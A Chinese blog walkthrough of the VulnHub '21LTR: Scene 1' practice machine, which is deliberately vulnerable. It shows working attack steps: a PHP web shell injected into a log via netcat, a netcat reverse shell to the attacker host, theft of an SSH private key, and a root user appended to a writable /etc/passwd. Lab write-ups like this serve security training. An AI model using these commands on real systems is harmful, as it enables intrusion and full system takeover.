21LTR: Scene 1靶机

最新推荐文章于 2024-09-05 14:16:37 发布
最新推荐文章于 2024-09-05 14:16:37 发布
阅读量571 收藏 6
点赞数 8
文章标签: 网络安全 开源 web安全 github 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/140793051
版权

靶机地址:21LTR: Scene 1 ~ VulnHub

一、信息收集

步骤一:根据靶机描述得知该靶机的IP只能为192.168.2.120

将攻击机kali以及靶机均设为仅主机模式,并配置虚拟网络编辑器,设置静态IP:

步骤二:查看靶机的MAC地址

步骤三:查看MAC地址对应的目标主机

arp-scan -l

步骤四:使用nmap扫描开放的端口

nmap -sV -p- 192.168.2.120

步骤五:浏览器访问

步骤六:使用dirb进行目录扫描

dirb http://192.168.2.120/

无可利用信息

步骤七:回到靶机页面,右键检查

发现一组账号密码logs zg]E-b0]+8:(58G

尝试ssh连接,发现连接失败

再尝试ftp连接,发现连接成功

ls,发现一个backup_log.php文件

将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件

get backup_log.php
cat backup_log.php

在网站路径上拼接/logs/,发现访问被拒绝

想起刚才ftp连接使用的用户是logs,那不妨试着在其后面拼接/backup_log.php看是否有信息

在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell

nc -nv 192.168.2.120 10001
<?php system($_GET['cmd']) ?>

拼接?cmd=id,尝试运行 id命令,发现得到回复。这证明我们可以从这里运行命令。

反弹shell

设置监听

nc -e /bin/sh 192.168.2.128 5555

反弹成功

建立交互式的shell:

python -c 'import pty; pty.spawn("/bin/sh")'

二、提权

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys    #发现是hbeale用户

查看密钥文件

cat id_rsa

查看/etc/passwd文件验证,发现确实存在hbeale用户:

尝试用密钥文件登录:

ssh -i id_rsa hbeale@192.168.2.120

登陆成功

但还是一个低权限用户

利用不安全配置/etc/passwd可写进行提权:

创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd

echo 'newuser:$1$8EZJzdE/$5d1Q3JqFEdQCeoAAA3Evb.:0:0:root:/root:/bin/bash' >> /etc/passwd

su切换newuser用户

提权成功

嗷嗷~嗷嗷~
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 720
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 405
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
Vulnhub靶机渗透之21LTRvunlhub
2301_77039831的博客
10-17 263
到这里有两种思路,因为可以通过root的cat命令读取文件,所以可以看/etc/shadow,也可以写入该文件。由于是php的日志所以思路是想办法把一句话写入这个页面,看了下其他大佬的WP,得访问10001端口。接下来是方法二,因为可以读取shadow文件,所以试图将root的shadow文件的密码进行破解。连接后看下敏感文件,结合靶机有ssh服务,尝试读取密钥,发现可以读取。先创建一个文件,内容是root的加密密码,然后使用john解密。先nmap扫一下,发现有21,22,80端口。
Hack the 21LTR: Scene 1 靶机
hqy250019的博客
07-30 375
在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。cmd=id,尝试运行 id命令,发现得到回复。创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件。发现扫描都没有,右键查看源代码,获得了一些登录凭据。ls,发现一个backup_log.php文件。在网站路径上拼接/logs/,发现访问被拒绝。再尝试ftp连接,发现连接成功。尝试ssh连接,发现连接失败。
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 372
21LTR:Scene1靶机,打靶文章
【vulnhub】Hack the 21LTR: Scene 1 靶机
wbplife的博客
08-11 377
然后将root用户的密码写入1.txt,然后开始破解,但是连接的时候,还是连接不上,应该是配置原因,那么只能写入高权限用户了。尝试拼接到刚才目录扫描的目录的logs目录下,发现可以访问到日志文件/logs/backup_log.php。可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件,选择读取shadow文件,破解密码。尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件。尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口。赋予权限,然后ssh登录。
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 412
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
Hack the 21LTR: Scene 1
weixin_53626662的博客
08-15 261
是默认ip192.168.2.120,攻击机和靶机的网卡都设置成2段的仅主机模式。2.右击查看源码,显示账户名密码logs:zg]E-b0]+8:(58G。5.拼接/logs/backup_log.php。将backup_log.php下载到本机并查看。然后cat查看/etc/passwd,成功创建。5.查看用户文件,有hbeale用户。1.利用passwd文件可写进行提权。2.切换到刚刚创建的用户,提权成功。将新用户加入passwd文件。4.拼接/logs,无果。6.启动netcat会话。
LQG-LTR:精馏塔多变量控制中的LqG/LTR方法-matlab开发
05-30
1. 精馏塔过程的数学模型,通常用状态空间形式表示。 2. Kalman滤波器的实现,用于估计系统的不确定状态。 3. LQG控制器的设计,包括权重矩阵的选择,以优化特定的性能指标。 4. 李雅普诺夫函数的构造和分析,确保...
panel-navigation-rtl-ltr:带有RTL支持的精美面板导航
05-11
标题 "panel-navigation-rtl-ltr:带有RTL支持的精美面板导航" 暗示了这是一个设计用于后台管理界面(admin dashboard)的导航组件,它具备右到左(RTL)和左到右(LTR)的语言布局支持。这在处理多语言网站或者需要...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
1. **词项匹配特征**:如精确匹配次数、模糊匹配次数、短语匹配等。 2. **位置特征**:查询词在文档标题或正文中的位置,如TF(Term Frequency)和位置信息。 3. **统计特征**:如文档的TF-IDF值,文档在查询结果中...
S905X3安卓9.0 安卓11 手柄驱动 调试命令 ampere:/ $ getevent -ltr add device 1
06-14
标题中的"S905X3安卓9.0 安卓11 手柄驱动"指的是基于Amlogic S905X3芯片的设备在运行Android 9.0或Android 11操作系统时的手柄驱动程序。S905X3是一款常见的应用于智能电视盒和流媒体设备的系统级芯片。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8446
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Docker 部署禅道开源
一直在路上
09-05 219
【代码】Docker 部署禅道开源版。
针对不同区域的摄像头,完成不同的算法配置的智慧快消开源
最新发布
weixin_63598920的博客
09-05 941
智慧快消视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。基于多年的深度学习技术研究和业务应用为基础,集深度学习核心训练和推理框架、基础模型库、端到端开发套件、丰富的工具组件于一体,是中国首个自主研发、功能完备、开源开放的产业级深度学习平台。基于自研深度学习框架的实时行人分析工具,具有功能丰富,应用广泛和部署高效三大优势。
开源免费】基于SpringBoot+Vue.JS在线竞拍系统(JAVA毕业设计)
customer08的博客
09-05 702
基于Vue.js和SpringBoot的在线竞拍系统,分为用户网页和管理后台,可以给管理员、普通用户使用,包括商品类型、拍卖商品、竞拍订单、留言板、系统公告模块。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值